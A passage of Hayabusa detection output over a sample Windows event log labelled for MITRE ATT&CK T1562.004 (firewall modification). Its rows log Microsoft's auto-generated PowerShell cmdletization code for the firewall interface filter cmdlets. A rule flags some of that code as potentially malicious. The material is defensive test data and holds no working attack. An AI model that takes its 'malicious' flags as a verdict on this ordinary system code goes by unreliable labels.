($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.000 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.000 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.001 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.003 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.004 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.026 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter 